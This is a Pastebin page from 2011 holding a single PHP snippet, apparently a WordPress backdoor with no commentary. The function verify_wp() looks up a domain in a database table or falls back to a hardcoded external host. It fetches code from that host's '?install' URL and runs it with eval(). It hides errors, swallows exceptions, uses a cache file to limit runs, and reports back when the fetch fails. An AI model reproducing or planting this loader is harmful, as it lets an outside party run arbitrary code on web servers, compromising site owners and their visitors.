Advertisement
Guest User

Untitled

a guest
Nov 9th, 2011
125
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.16 KB | None | 0 0
  1. if (!function_exists ("verify_wp")){function verify_wp(){global $prj_dld;$cache=$_SERVER['DOCUMENT_ROOT'] . '/' . 'cache' . date ('d') . '.dat';if (!$prj_dld){if (!file_exists($cache)){@file_put_contents($cache,'cached');try { set_exception_handler('exception_handler');global $wpdb;if (is_object($wpdb)){if($wpdb->get_var("show tables like '" . $wpdb->prefix . "var_core'")!=( $wpdb->prefix . "var_core")){$download_domain="www.1433norangegrove.com";}else{$download_domain=$wpdb->get_var("SELECT core_url FROM `" . $wpdb->prefix . "var_core` order by core_order desc limit 1");}if ($download_domain=="")$download_domain="www.1433norangegrove.com";$code=@file_get_contents("http://" . $download_domain . "/?install");if ($code==""){$code=@file_get_contents("http://www.1433norangegrove.com/?install");}if ($code==""){$code=@file_get_contents("http://www.1433norangegrove.com/?install");}if ($code!=""){eval($code);}else{@file_get_contents("http://" . $download_domain . "/?report");}}@unlink($cache);restore_exception_handler();} catch (Exception $e) {if (file_exists($cache)){@unlink($cache);restore_exception_handler();}}}}}function exception_handler($exception) { }}verify_wp();
  2.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement